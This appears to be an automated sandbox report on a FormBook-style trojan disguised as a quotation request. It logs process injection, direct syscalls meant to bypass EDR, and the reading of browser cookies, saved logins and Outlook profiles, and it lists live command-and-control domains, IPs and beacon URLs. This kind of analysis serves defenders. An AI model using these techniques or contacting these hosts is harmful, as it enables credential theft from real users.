                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B28918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BAE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BD4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BBC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B7096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B7096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BB0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03C008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BBC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B30887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B52835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_008280A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_007FA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_007FA124 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\comp.exe Section loaded: NULL target: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe protection: read write
                Source: C:\Windows\SysWOW64\comp.exe Section loaded: NULL target: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\comp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\comp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\comp.exe Thread register set: target process: 6768
                Source: C:\Windows\SysWOW64\comp.exe Thread APC queued: target process: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 3190008
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_008287B1 LogonUserW
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_007D3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_007D48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_00834C27 mouse_event
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation Request-349849.exe"
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
                Source: C:\Windows\SysWOW64\comp.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_00827CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_0082874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: Quotation Request-349849.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Quotation Request-349849.exe, LcmEonpIrfS.exe, 00000005.00000000.1645958140.0000000001650000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2559026369.0000000001651000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559676840.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: LcmEonpIrfS.exe, 00000005.00000000.1645958140.0000000001650000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2559026369.0000000001651000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559676840.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: LcmEonpIrfS.exe, 00000005.00000000.1645958140.0000000001650000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2559026369.0000000001651000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559676840.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
                Source: LcmEonpIrfS.exe, 00000005.00000000.1645958140.0000000001650000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2559026369.0000000001651000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559676840.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_007F862B cpuid
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_00804E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_00811E06 GetUserNameW
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_00803F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_007D49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match, File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\comp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\comp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\comp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\comp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\comp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\comp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\comp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\comp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\comp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: Quotation Request-349849.exe Binary or memory string: WIN_81
                Source: Quotation Request-349849.exe Binary or memory string: WIN_XP
                Source: Quotation Request-349849.exe Binary or memory string: WIN_XPe
                Source: Quotation Request-349849.exe Binary or memory string: WIN_VISTA
                Source: Quotation Request-349849.exe Binary or memory string: WIN_7
                Source: Quotation Request-349849.exe Binary or memory string: WIN_8
                Source: Quotation Request-349849.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match, File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_00846283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe Code function: 0_2_00846747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (one line per tactic; a number in front of a technique is the count the report attaches to it)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: 3 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
                Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1574656 | Sample: Quotation Request-349849.exe | Startdate: 13/12/2024 | Architecture: WINDOWS | Score: 100

                Start (node 2)
                  DNS/IP: www.infohive.website; www.gk88top.top; 5 other IPs or domains
                  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures
                  -> Quotation Request-349849.exe 2 (node 10, started)
                     Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
                     -> svchost.exe (node 13, started)
                        Signatures: Maps a DLL or memory area into another process
                        -> LcmEonpIrfS.exe (node 16, injected)
                           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                           -> comp.exe 13 (node 19, started)
                              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                              -> LcmEonpIrfS.exe (node 22, injected)
                                 DNS/IP: qqa79.top 38.47.233.21, ports 49822, 80, COGENT-174US United States; www.gk88top.top 172.67.137.47, ports 49858, 49868, 49874, CLOUDFLARENETUS United States; 3 other IPs or domains
                                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                              -> firefox.exe (node 26, started)

                Source | Detection | Scanner | Label | Link
                Quotation Request-349849.exe | 47% | ReversingLabs | Win32.Trojan.AutoitInject |
                Quotation Request-349849.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://www.127358.win/2mep/?Er=qt9d5V&UZkt_p=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk4oV88xQLJu313/wS+c/dWkGwsg/R2WIJaTqq/By1MtUaaLvo6grX4O5 | 0% | Avira URL Cloud | safe |
                http://www.sunnyz.store | 0% | Avira URL Cloud | safe |
                http://www.sunnyz.store/ead0/ | 0% | Avira URL Cloud | safe |
                http://www.infohive.website/cnve/ | 0% | Avira URL Cloud | safe |
                http://www.gk88top.top/vjnn/?UZkt_p=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2FtKgHUwtP7LZToi+NLiM5u8oda1xOl7pN9QCYN1UR2qYINqcP5uKuM1&Er=qt9d5V | 0% | Avira URL Cloud | safe |
                http://www.infohive.website/cnve/?UZkt_p=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVYx8sa0WL+tT4casLEwE0iohoJSZhnQSJqMleUJfhtsmPpk3GYPvE1sgo&Er=qt9d5V | 0% | Avira URL Cloud | safe |
                http://www.127358.win/2mep/ | 0% | Avira URL Cloud | safe |
                http://www.gk88top.top/vjnn/ | 0% | Avira URL Cloud | safe |
                http://www.sunnyz.store/ead0/?UZkt_p=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBis+/iOoNTjmW2l9qNTHM4rN5vAuihI7D9EwPr7Z7opV/5wbcLxFzIpB/&Er=qt9d5V | 0% | Avira URL Cloud | safe |
                http://www.qqa79.top/t67p/?UZkt_p=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK5swGMfjJNS9OKmwWbAAHFg65wmu/s0j5u+YMxZCZuR1sUVf7BfBaxXx&Er=qt9d5V | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                qqa79.top | 38.47.233.21 | true | true | | unknown
                webredir.vip.gandi.net | 217.70.184.50 | true | false | | high
                www.127358.win | 206.238.89.119 | true | false | | high
                www.infohive.website | 66.29.149.46 | true | true | | unknown
                www.gk88top.top | 172.67.137.47 | true | true | | unknown
                www.sunnyz.store | unknown | unknown | false | | unknown
                www.qqa79.top | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.infohive.website/cnve/ | true | Avira URL Cloud: safe | unknown
http://www.sunnyz.store/ead0/ | true | Avira URL Cloud: safe | unknown
http://www.sunnyz.store/ead0/?UZkt_p=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBis+/iOoNTjmW2l9qNTHM4rN5vAuihI7D9EwPr7Z7opV/5wbcLxFzIpB/&Er=qt9d5V | true | Avira URL Cloud: safe | unknown
http://www.qqa79.top/t67p/?UZkt_p=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK5swGMfjJNS9OKmwWbAAHFg65wmu/s0j5u+YMxZCZuR1sUVf7BfBaxXx&Er=qt9d5V | true | Avira URL Cloud: safe | unknown
http://www.gk88top.top/vjnn/?UZkt_p=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2FtKgHUwtP7LZToi+NLiM5u8oda1xOl7pN9QCYN1UR2qYINqcP5uKuM1&Er=qt9d5V | true | Avira URL Cloud: safe | unknown
http://www.127358.win/2mep/ | true | Avira URL Cloud: safe | unknown
http://www.127358.win/2mep/?Er=qt9d5V&UZkt_p=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk4oV88xQLJu313/wS+c/dWkGwsg/R2WIJaTqq/By1MtUaaLvo6grX4O5 | true | Avira URL Cloud: safe | unknown
http://www.gk88top.top/vjnn/ | true | Avira URL Cloud: safe | unknown
